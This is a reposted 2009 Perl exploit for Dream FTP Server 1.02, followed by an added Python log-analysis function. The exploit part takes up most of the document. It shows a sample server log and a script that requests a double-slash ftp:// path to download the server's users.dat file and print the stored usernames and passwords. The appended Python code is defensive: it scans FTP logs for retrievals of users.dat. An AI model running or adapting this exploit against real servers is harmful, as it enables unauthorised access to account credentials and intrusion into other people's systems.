Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit
Source: WwW.No-Exploit.CoM  Author: Cyber-Zone  Published: 2009-04-24

#!/usr/bin/perl -w
#
# This Bug Similar to others found By My Friend : Stack <= so special Thanx
# So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That
# But This Exploit i will get Users & Passwords Of The application From : users.dat : C:\Program Files\BolinTech\users.dat
# In This Exploit I Used The Port 80 You can use any port you want 21
#################################################################################################################################
#23/04/2009 13:20:25  FTP Server started on port 80.
#23/04/2009 13:25:43  [0000000002] Client connected from 127.0.0.1.
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220-      Welcome to Dream FTP Server
#23/04/2009 13:25:43  [0000000002] 220-      Copyright 2002 - 2004
#23/04/2009 13:25:43  [0000000002] 220-      BolinTech Inc.
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220 
#23/04/2009 13:25:43  [0000000002] USER anonymous
#23/04/2009 13:25:43  [0000000002] 331 Password required for anonymous
#23/04/2009 13:25:43  [0000000002] PASS **********
#23/04/2009 13:25:43  [0000000002] 230 User successfully logged in.
#23/04/2009 13:25:43  [0000000002] PWD
#23/04/2009 13:25:43  [0000000002] 257 "/" is current directory.
#23/04/2009 13:25:43  [0000000002] TYPE I
#23/04/2009 13:25:43  [0000000002] 200 Type set to I
#23/04/2009 13:25:43  [0000000002] CWD Program Files
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files" is current directory.
#23/04/2009 13:25:43  [0000000002] CWD BolinTech
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files/BolinTech" is current directory.
#23/04/2009 13:25:43  [0000000002] MDTM users.dat
#23/04/2009 13:25:43  [0000000002] 502 Command not implemented - Try HELP.
#23/04/2009 13:25:43  [0000000002] PASV
#23/04/2009 13:25:43  [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145).
#23/04/2009 13:25:43  [0000000002] RETR users.dat
#23/04/2009 13:25:43  [0000000002] 150 Opening BINARY mode data connection for file transfer.
#23/04/2009 13:25:43  [0000000002] 226 Transfer complete
#23/04/2009 13:25:43  [0000000002] Client disconnected from 127.0.0.1.
#################################################################################################################################
# Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html
# Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers
#################################################################################################################################
# welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online
#################################################################################################################################
# Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png
#################################################################################################################################
use LWP::Simple;
use LWP::UserAgent;

print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 3)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port \n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 \n";
}
($HackerName, $TargetIP, $AttackedPort) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);

print("          ******************************\n");
print("          *             Status         *\n");
print("          ******************************\n");
print("$HackerName , AttaCking The Target : $TargetIP \n");
print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d\n");
$terget1="Program Files";
$target2="BolinTech";
$target3="users.dat";
$slash="/";
$TargetFile=$terget1.$slash.$target2.$slash.$target3;
$temp="/" x 2;
my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....>    |80\n");
sleep(15);
print("Exploiting ..........|Done!\n");
sleep(5);
$Disclosure=get $boom;
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print(".........................EOF.......................\n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");
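
Added example (not part of the original exploit and not from its author): a Python check that replays the Dream FTP Server session log shown in the header comments and flags every session that issues RETR for users.dat, resolving the full path from the server's 250/257 replies and recording whether the transfer completed. The function name, the SENSITIVE set and the second log session (including its 550 reply text) are assumptions constructed for illustration.

```python
import re
from posixpath import join, normpath

# Constructed sample: header log lines ('#' dropped) plus an invented session 3.
SAMPLE_LOG = """\
23/04/2009 13:25:43  [0000000002] Client connected from 127.0.0.1.
23/04/2009 13:25:43  [0000000002] USER anonymous
23/04/2009 13:25:43  [0000000002] CWD Program Files
23/04/2009 13:25:43  [0000000002] 250 "/Program Files" is current directory.
23/04/2009 13:25:43  [0000000002] CWD BolinTech
23/04/2009 13:25:43  [0000000002] 250 "/Program Files/BolinTech" is current directory.
23/04/2009 13:25:43  [0000000002] RETR users.dat
23/04/2009 13:25:43  [0000000002] 150 Opening BINARY mode data connection for file transfer.
23/04/2009 13:25:43  [0000000002] 226 Transfer complete
23/04/2009 13:26:10  [0000000003] Client connected from 127.0.0.1.
23/04/2009 13:26:10  [0000000003] USER anonymous
23/04/2009 13:26:10  [0000000003] RETR /Program Files/BolinTech/USERS.DAT
23/04/2009 13:26:10  [0000000003] 550 Permission denied.
"""

LINE = re.compile(r"^#?(\S+ \S+)\s+\[(\d+)\]\s+(.*)$")   # timestamp, session id, message
CWD_REPLY = re.compile(r'^25[07] "([^"]*)" is current directory')
SENSITIVE = {"users.dat"}  # assumption: the account file named on this page

def find_credential_reads(log_text, sensitive=SENSITIVE):
    """Return one alert dict per RETR of a sensitive file, tracked per session id."""
    sessions, alerts = {}, []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # lines without a session id, e.g. "FTP Server started on port 80."
        ts, sid, msg = m.groups()
        s = sessions.setdefault(sid, {"ip": None, "user": None, "cwd": "/", "open": None})
        verb, _, arg = msg.partition(" ")
        if msg.startswith("Client connected from "):
            s["ip"] = msg.split()[-1].rstrip(".")
        elif verb.upper() == "USER":
            s["user"] = arg.strip()
        elif (c := CWD_REPLY.match(msg)):
            s["cwd"] = c.group(1)  # trust the server's reply, not the CWD request
        elif verb.upper() == "RETR":
            path = normpath(join(s["cwd"], arg.strip().replace("\\", "/")))
            if path.rsplit("/", 1)[-1].lower() in sensitive:
                s["open"] = {"time": ts, "session": sid, "ip": s["ip"], "user": s["user"],
                             "path": path, "outcome": "attempted"}
                alerts.append(s["open"])
        elif s["open"] and verb.isdigit() and verb[0] in "245":  # final reply to RETR
            s["open"]["outcome"] = "transferred" if verb == "226" else "refused"
            s["open"] = None
    return alerts
```

Calling find_credential_reads(SAMPLE_LOG) returns two alerts: the anonymous session from the header log with outcome "transferred", and the constructed session with outcome "refused".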


 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved